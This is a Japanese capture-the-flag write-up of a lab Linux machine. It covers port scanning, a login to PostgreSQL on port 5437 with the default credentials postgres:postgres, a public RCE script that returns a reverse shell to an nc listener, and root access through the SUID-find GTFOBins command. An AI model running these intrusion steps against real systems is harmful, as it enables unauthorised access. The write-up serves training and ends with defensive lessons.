概要
| Field | Value |
| OS | Linux |
| 難易度 | 記録なし |
| 攻撃対象 | 21/tcp FTP, 22/tcp SSH, 80/tcp HTTP, 5437/tcp PostgreSQL |
| 主な侵入経路 | 公開 DB サービスでの PostgreSQL デフォルト認証情報 (postgres:postgres) |
| 権限昇格経路 | GTFOBins を使った SUID find (/usr/bin/find) の悪用 |
認証情報
| Username | Password | Context |
postgres | postgres | PostgreSQL login on 5437/tcp |
偵察
RustScan による高速ポート探索
最初の目標は、重いスキャンを実行する前に到達可能な全 TCP サービスを特定することです。RustScan を速度のために使用し、公開されている対象を素早くマッピングして焦点を当てる場所を決定します。この時点では、ネットワークに公開されたデータベースなど、通常とは異なる高価値サービスを具体的に探します。
1
| rustscan -a $ip -r 1-65535 --ulimit 5000
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| ✅[12:22][CPU:20][MEM:68][TUN0:192.168.45.166][/home/n0z0]
🐉 > rustscan -a $ip -r 1-65535 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀
[~] The config file is expected to be at "/home/n0z0/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 192.168.178.47:21
Open 192.168.178.47:22
Open 192.168.178.47:80
Open 192.168.178.47:5437
[~] Starting Script(s)
|
💡 なぜ有効か 高速探索により列挙までの時間を短縮し、非標準サービスの見落としを防ぎます。ここでの主要な発見は 5437/tcp という通常とは異なる PostgreSQL ポートであり、これが主要な攻撃パスとなりました。
Nmap によるサービスおよびバージョン列挙
開放ポートを特定した後、次のステップはサービスのバージョンとプロトコルの詳細を収集することです。-sCV と -A を使用して、デフォルトスクリプト、バージョン検出、より豊富なフィンガープリントを 1 回の実行で組み合わせます。直接認証またはコマンド実行を可能にする弱い設定とサービスを探します。
1
2
3
4
| timestamp=$(date +%Y%m%d-%H%M%S)
output_file="$HOME/work/scans/${timestamp}_${ip}.xml"
grc nmap -p- -sCV -sV -T4 -A -Pn "$ip" -oX "$output_file"
echo -e "\e[32mScan result saved to: $output_file\e[0m"
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| ✅[12:22][CPU:18][MEM:67][TUN0:192.168.45.166][/home/n0z0]
🐉 > timestamp=$(date +%Y%m%d-%H%M%S)
output_file="$HOME/work/scans/${timestamp}_${ip}.xml"
grc nmap -p- -sCV -sV -T4 -A -Pn "$ip" -oX "$output_file"
echo -e "\e[32mScan result saved to: $output_file\e[0m"
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-23 12:22 JST
Nmap scan report for 192.168.178.47
Host is up (0.085s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 10:62:1f:f5:22:de:29:d4:24:96:a7:66:c3:64:b7:10 (RSA)
| 256 c9:15:ff:cd:f3:97:ec:39:13:16:48:38:c5:58:d7:5f (ECDSA)
|_ 256 90:7c:a3:44:73:b4:b4:4c:e3:9c:71:d1:87:ba:ca:7b (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Enter a title, displayed at the top of the window.
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
5437/tcp open postgresql PostgreSQL DB 11.3 - 11.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2020-04-27T15:41:47
|_Not valid after: 2030-04-25T15:41:47
Aggressive OS guesses: Linux 5.0 - 5.14 (98%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (98%), Linux 4.15 - 5.19 (94%), Linux 2.6.32 - 3.13 (93%), Linux 5.0 (92%), OpenWrt 22.03 (Linux 5.10) (92%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (90%), Linux 4.15 (90%), Linux 2.6.32 - 3.10 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 84.67 ms 192.168.45.1
2 84.63 ms 192.168.45.254
3 84.76 ms 192.168.251.1
4 84.78 ms 192.168.178.47
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.62 seconds
Scan result saved to: /home/n0z0/work/scans/20260223-122259_192.168.178.47.xml
|
💡 なぜ有効か バージョンを考慮したスキャンは、開放ポートを実行可能な攻撃パスに結びつけます。この場合、公開された PostgreSQL と弱い認証情報の組み合わせにより、認証済みアクセスとデータベース機能を通じたコード実行が可能になりました。
初期足がかり
デフォルト認証情報を使った PostgreSQL への認証
データベースサービスに直接アクセス可能だったため、手動での psql ログイン試行が最速の検証方法でした。ここでの目標は、弱い認証情報またはデフォルト認証情報が受け入れられるか、そしてロールに昇格した権限があるかを確認することです。スーパーユーザーアカウントでのログイン成功により、列挙フェーズから攻撃フェーズへ即座に移行できます。
1
| psql -h $ip -p 5437 -U postgres
|
1
2
3
4
5
6
7
8
| ❌[2:55][CPU:4][MEM:65][TUN0:192.168.45.166][/home/n0z0]
🐉 > psql -h $ip -p 5437 -U postgres
ユーザー postgres のパスワード:
psql (17.6 (Debian 17.6-1)、サーバー 11.7 (Debian 11.7-0+deb10u1))
SSL接続(プロトコル: TLSv1.3、暗号化方式: TLS_AES_256_GCM_SHA384、圧縮: オフ、ALPN: なし)
"help"でヘルプを表示します。
postgres=#
|
💡 なぜ有効か デフォルト認証情報は現実世界での最も一般的な失敗の一つであり続けています。PostgreSQL のスーパーユーザーアクセスにより、COPY ... PROGRAM のような危険な機能がデータベースサービスのコンテキストで OS コマンドを実行できます。
PostgreSQL RCE スクリプトによる OS コマンド実行のトリガー
スーパーユーザーとして認証されたら、次のステップはシェルを確立するための OS レベルのペイロードを実行することです。PostgreSQL_RCE ヘルパースクリプトがデータベース側のコマンド実行とコールバック動作を自動化します。この段階では、攻撃者のリスナーへのインバウンド接続を探します。
1
| python3 postgresql_rce.py
|
1
2
3
4
5
| ✅[3:10][CPU:20][MEM:66][TUN0:192.168.45.166][...nd/Nibbles/PostgreSQL_RCE]
🐉 > python3 postgresql_rce.py
[!] Connected to the PostgreSQL database
[*] Executing the payload. Please check if you got a reverse shell!
|
以下のコマンドはコールバックをリッスンし、リモートコード実行を検証します。接続後の期待される結果は、データベース OS ユーザーとして実行するインタラクティブなシェルです。
1
2
3
4
5
6
| ❌[3:10][CPU:5][MEM:66][TUN0:192.168.45.166][/home/n0z0]
🐉 > nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.166] from (UNKNOWN) [192.168.178.47] 45726
/bin/sh: 0: can't access tty; job control turned off
$
|
local.txt の取得
シェルアクセスが確認されたら、すぐにユーザーフラグを見つけて読み取ることでユーザーレベルの侵害を証明します。find を使ってパーミッションエラーのノイズを抑制しながらファイルシステム全体で素早くファイルパスを特定します。
1
2
| find / -iname local.txt 2>/dev/null
cat /home/wilson/local.txt
|
1
2
3
4
| postgres@nibbles:/var/lib/postgresql/11/main$ find / -iname local.txt 2>/dev/null
/home/wilson/local.txt
postgres@nibbles:/var/lib/postgresql/11/main$ cat /home/wilson/local.txt
1beb5b3c9276ff5ba80a2128a85396d6
|
💡 なぜ有効か PostgreSQL のコマンド実行は postgres OS アカウントで実行されており、通常はローカルファイルや権限昇格ベクターを列挙するのに十分です。local.txt の取得により足がかりが確認され、実際の影響が検証されます。
権限昇格
SUID バイナリの列挙
権限昇格は、攻撃者が制御するコマンドを実行できる特権バイナリの特定から始まります。以下の列挙出力は SUID ビットが設定された find をハイライトしており、これは既知の GTFOBins 権限昇格パスです。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| ══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Jan 7 2019 /usr/bin/fusermount
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 309K Feb 16 2019 /usr/bin/find
-rwsr-xr-x 1 root root 154K Feb 2 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
|
SUID find を悪用して root を取得
find の GTFOBins メソッドは -exec を通じてコマンドを実行し、昇格した実効権限を維持する bash -p を起動します。これは侵害されたシェルから直接実行して postgres から root に移行します。期待される結果は /root/proof.txt の読み取り成功です。
1
2
| find . -exec /bin/bash -p \; -quit
cat /root/proof.txt
|
1
2
3
4
5
| postgres@nibbles:/tmp$ find . -exec /bin/bash -p \; -quit
bash-5.0# cat /root/proof.txt
04102c714c890c2b14c6f3f2286e248d
bash-5.0#
|
💡 なぜ有効か これは GTFOBins の典型的な権限昇格です。find が SUID-root の場合、-exec は昇格した権限でコマンドを実行し、bash -p はその実効 UID を降格させずに保持します。
まとめ・学んだこと
- 信頼されていないネットワークに公開されたデータベースサービスは、デフォルト認証情報を許可すべきではありません。
- PostgreSQL のスーパーユーザーアクセスは実質的に OS コマンド実行リスクと同義です。
- 高シグナルのローカルチェック(SUID、sudo、capabilities)は足がかりを得た直後に実行すべきです。
- SUID 付きの
find は直接 root への経路であり、重大な設定ミスとして扱う必要があります。
flowchart LR
subgraph SCAN["Scan"]
direction TB
S1["Rustscan / Nmap\n21,22,80,5437"]
S2["vsftpd 3.0.3\nOpenSSH 7.9p1\nApache 2.4.38"]
S3["PostgreSQL 11.7\nNon-standard port 5437"]
S1 --> S2 --> S3
end
subgraph INITIAL["Initial Foothold"]
direction TB
I1["psql -h \$ip -p 5437 -U postgres\npostgres:postgres"]
I2["PostgreSQL superuser\nOS command execution path"]
I3["postgresql_rce.py\nReverse shell on port 80"]
I4["cat /home/wilson/local.txt\n1beb5b3c9276ff5ba80a2128a85396d6"]
I1 --> I2 --> I3 --> I4
end
subgraph PRIVESC["Privilege Escalation"]
direction TB
P1["SUID enumeration\n/usr/bin/find identified"]
P2["GTFOBins find\n-exec /bin/bash -p"]
P3["cat /root/proof.txt\n04102c714c890c2b14c6f3f2286e248d"]
P1 --> P2 --> P3
end
SCAN --> INITIAL --> PRIVESC
参考文献
- RustScan: https://github.com/RustScan/RustScan
- Nmap: https://nmap.org/
- PostgreSQL_RCE: https://github.com/squid22/PostgreSQL_RCE
- HackTricks Linux Privilege Escalation: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html
- GTFOBins (
find): https://gtfobins.org/gtfobins/find/ - GNU findutils: https://www.gnu.org/software/findutils/